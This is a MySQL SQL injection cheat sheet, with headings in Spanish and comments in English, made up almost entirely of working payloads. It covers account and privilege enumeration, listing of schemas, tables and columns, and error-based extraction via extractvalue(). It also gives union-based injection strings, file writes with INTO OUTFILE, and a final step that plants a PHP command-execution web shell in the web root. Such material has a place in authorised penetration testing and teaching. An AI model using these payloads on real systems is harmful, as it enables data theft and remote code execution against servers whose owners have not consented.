# Account the injected query runs as. current_user() is the account the
# server actually authenticated (the one privileges are checked against);
# user() is the name/host the client sent, and system_user() is its synonym.
SELECT current_user();
SELECT system_user();
SELECT user();

# Every account known to the server (needs read access to mysql.user).
SELECT user FROM mysql.user;
Privilegios
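# Global privileges of every account, one row per (grantee, privilege).
SELECT grantee, privilege_type
FROM information_schema.user_privileges;

# Grants of the account the injected query runs as.
SHOW GRANTS FOR CURRENT_USER();

# Does <user> hold SUPER? ('Y' = yes). Use single quotes for the literal:
# with sql_mode ANSI_QUOTES, "<user>" is parsed as an identifier and the
# query fails.
SELECT super_priv
FROM mysql.user
WHERE user = '<user>';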
Bases de datos
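# Database the injected query is currently using.
SELECT database();

# All databases visible to the current account.
SHOW databases;
SELECT schema_name FROM information_schema.schemata;

# Same list via information_schema.tables. Note this only returns schemas
# that contain at least one table, so empty databases will be missing here;
# prefer information_schema.schemata when it is readable.
SELECT table_schema
FROM information_schema.tables
GROUP BY table_schema;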
Tablas
# Tables of the database the connection is currently using.
SHOW tables;

# Tables of an arbitrary database (replace <database>).
SELECT table_schema, table_name
FROM information_schema.tables
WHERE table_schema = '<database>';
Columnas
# Columns of <table> in <database>, together with their declared types.
SELECT column_name, data_type
FROM information_schema.columns
WHERE table_schema = '<database>'
  AND table_name = '<table>';
Datos
# Dump every row of the table. The schema-qualified name works regardless of
# which database the connection currently uses.
SELECT * FROM <database>.<table>;
# Error-based extraction: the leading '>' makes the XPath expression
# invalid, so MySQL raises "XPATH syntax error" and echoes the concatenated
# value inside the error message. The message only shows roughly 32
# characters, so long group_concat() results are truncated - page through
# them with the NOT IN / LIMIT ... OFFSET variants further down.

# Current database
extractvalue('', concat('>', database()))

# List of databases (MySQL requires an alias, here "foo", on derived tables)
extractvalue('', concat('>', (
    SELECT group_concat(table_schema)
    FROM (
        SELECT table_schema
        FROM information_schema.tables
        GROUP BY table_schema
    ) AS foo
)))
Tablas
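# All tables of <database> in one (truncated) error message.
extractvalue('', concat('>', (
    SELECT group_concat(table_name)
    FROM (
        SELECT table_name
        FROM information_schema.tables
        WHERE table_schema = '<database>'
    ) AS foo
)))

# Same, hiding tables already read so the remaining names fit into the
# error message (append every table you have already seen to the NOT IN list).
extractvalue('', concat('>', (
    SELECT group_concat(table_name)
    FROM (
        SELECT table_name
        FROM information_schema.tables
        WHERE table_schema = '<database>'
          AND table_name NOT IN ('<table>')
    ) AS foo
)))

# One table per request: start at OFFSET 0 and increase it by one each time
# until the error message comes back empty. LIMIT and OFFSET must be
# separate keywords ("limit1" is a syntax error).
extractvalue('', concat('>', (
    SELECT group_concat(table_name)
    FROM (
        SELECT table_name
        FROM information_schema.tables
        WHERE table_schema = '<database>'
        LIMIT 1 OFFSET 1
    ) AS foo
)))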
Columnas
# Columns of <table> in <database>.
extractvalue('', concat('>', (
    SELECT group_concat(column_name)
    FROM (
        SELECT column_name
        FROM information_schema.columns
        WHERE table_schema = '<database>'
          AND table_name = '<table>'
    ) AS foo
)))

# Same, skipping columns already read (append each one to the NOT IN list)
# so the remaining names fit into the truncated error message.
extractvalue('', concat('>', (
    SELECT group_concat(column_name)
    FROM (
        SELECT column_name
        FROM information_schema.columns
        WHERE table_schema = '<database>'
          AND table_name = '<table>'
          AND column_name NOT IN ('<column>')
    ) AS foo
)))
Datos
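# Read one row of <column>, 32 characters at a time, since the error message
# only echoes about that much. Increase OFFSET to walk the rows; move the
# substring() start (1, 33, 65, ...) to read the rest of a long value.
# LIMIT and OFFSET must be written as separate keywords.
extractvalue('', concat('>', (
    SELECT substring(<column>, 1, 32)
    FROM <table>
    LIMIT 1 OFFSET 0
)))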
Union-based SQLi
Bases de datos
# The number of columns in the UNION (4 here) must match the query being
# injected into; the numeric fillers are arbitrary. "-- -" comments out
# whatever the application appends after the injection point.

# Current database
UNION SELECT 1, database(), 3, 4-- -

# List of databases
UNION SELECT 1, schema_name, 3, 4 FROM information_schema.schemata-- -
Tablas
# Tables of <database>; table_schema is returned as well so each row is
# unambiguous when several databases are enumerated.
UNION SELECT 1, table_schema, table_name, 4 FROM information_schema.tables WHERE table_schema = '<database>'-- -
Columnas
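# Column names and types of <table>. The numeric fillers are arbitrary and
# are kept as 1 ... 4 like the other payloads; only the column count has to
# match the injected query.
UNION SELECT 1, column_name, data_type, 4 FROM information_schema.columns WHERE table_schema = '<database>' AND table_name = '<table>'-- -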
Datos
# Read two columns of a table at once (replace columna1/columna2 with names
# found in the previous step).
UNION SELECT 1, columna1, columna2, 4 FROM <database>.<table>-- -
Obtener información dentro de una sola columna
# When the page reflects only one column, pack several columns into it.
# CONCAT() returns NULL as soon as ANY argument is NULL, which silently hides
# the whole row; CONCAT_WS() skips NULL arguments, so prefer it when a
# column may be NULL.
UNION SELECT CONCAT(columna1, ' - ', columna2, ' - ', columna3) FROM tabla1-- -
UNION SELECT CONCAT_WS(' - ', columna1, columna2, columna3) FROM tabla1-- -
Lectura y escritura de archivos
Para poder leer y escribir archivos se deben cumplir las siguientes condiciones:
El usuario de MySQL con el que se ejecuta la consulta inyectada debe tener el privilegio FILE (se puede comprobar con SELECT file_priv FROM mysql.user WHERE user='<user>').
Valor de la variable global secure_file_priv:
Un valor vacío nos permite leer y escribir en cualquier directorio.
Si se establece un determinado directorio, solo podemos leer y escribir desde la carpeta especificada por la variable.
NULL significa que no podemos leer ni escribir en ningún directorio (la funcionalidad está deshabilitada).
El usuario del sistema operativo con el que se ejecuta mysqld (no el usuario de MySQL) debe tener permisos de lectura y escritura sobre la ubicación en la que queremos leer o escribir el archivo; la ruta es del servidor de base de datos, no del cliente.
Obtener valor de la variable global secure_file_priv.
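# Where FILE operations are allowed: '' = anywhere, a path = only inside
# that directory, NULL = disabled.
SELECT @@GLOBAL.secure_file_priv;

# Same value through a table, so it can be read from a UNION.
# information_schema.global_variables was deprecated in MySQL 5.7.6 and
# removed in 8.0 (MariaDB still provides it); on MySQL >= 5.7 read
# performance_schema.global_variables instead. Single-quote the literal so
# it also works under sql_mode ANSI_QUOTES.
SELECT variable_name, variable_value
FROM information_schema.global_variables
WHERE variable_name = 'secure_file_priv';

SELECT variable_name, variable_value
FROM performance_schema.global_variables
WHERE variable_name = 'secure_file_priv';

# UNION variants (pick the table that exists on the target)
UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables WHERE variable_name = 'secure_file_priv'-- -
UNION SELECT 1, variable_name, variable_value, 4 FROM performance_schema.global_variables WHERE variable_name = 'secure_file_priv'-- -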
# Write files on the database server host. Needs the FILE privilege, a
# permissive secure_file_priv and a path the mysqld OS user can write to.
# INTO OUTFILE never overwrites: if the target already exists the statement
# fails, so choose a fresh file name each time. On systemd hosts mysqld may
# run with a private /tmp, in which case a file written there is not
# visible in the host's /tmp.
SELECT * FROM <table> INTO OUTFILE '/tmp/file';
SELECT 'test' INTO OUTFILE '/tmp/test.txt';

# From a UNION injection; the filler columns are written as well
# (tab-separated by default).
UNION SELECT 1, 'test', 3, 4 INTO OUTFILE '/var/www/html/test.txt'-- -
Escritura de web shell.
webshell.php
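<?php
// Minimal command-execution web shell: runs the value of the "cmd" query
// parameter through system() and echoes its output ("echo" and "system"
// must be separate tokens - "echosystem" is an undefined function).
// WARNING: there is no authentication at all; anyone who finds this file
// can run commands as the web server user. Use only inside an authorised
// engagement and delete it when finished.
echo system($_GET['cmd']);
?>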
UNION SELECT "","<?php echo system($_GET['cmd']); ?>","","" INTO OUTFILE '/var/www/html/webshell.php'-- -